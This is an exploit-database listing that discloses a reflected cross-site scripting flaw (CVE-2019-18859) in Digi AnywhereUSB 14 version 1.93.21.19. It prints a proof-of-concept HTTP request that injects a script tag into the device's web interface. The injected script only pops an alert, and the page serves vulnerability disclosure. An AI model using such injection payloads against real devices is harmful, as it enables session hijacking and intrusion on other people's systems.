Lucene search
Raspina Net Pars GroupPACKETSTORM:155926HistoryJan 13, 2020 - 12:00 a.m.
Digi AnywhereUSB 14 Cross Site Scripting
2020-01-1300:00:00
Raspina Net Pars Group
packetstormsecurity.com
103
0.003 Low
EPSS
Percentile
66.0%
`# Exploit Title: Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
# Date: 2019-11-10
# Exploit Author: Raspina Net Pars Group
# Vendor Homepage: https://www.digi.com/products/networking/usb-connectivity/usb-over-ip/awusb
# Version: 1.93.21.19
# CVE : CVE-2019-18859
# PoC
GET //--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT> HTTP/1.1
Host: Target
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
# Author Website: HTTPS://RNPG.info
`
Related
nvd
nvd
CVE-2019-18859
2020-01-09 21:15:11
zdt
zdt
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting Vulnerability
2020-01-13 00:00:00
exploitpack
exploitpack
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
2020-01-13 00:00:00
prion
prion
Design/Logic Flaw
2020-01-09 21:15:00
cvelist
cvelist
CVE-2019-18859
2020-01-09 20:07:12
cve
cve
CVE-2019-18859
2020-01-09 21:15:11
exploitdb
exploitdb
Digi AnywhereUSB 14 - Reflective Cross-Site Scripting
2020-01-13 00:00:00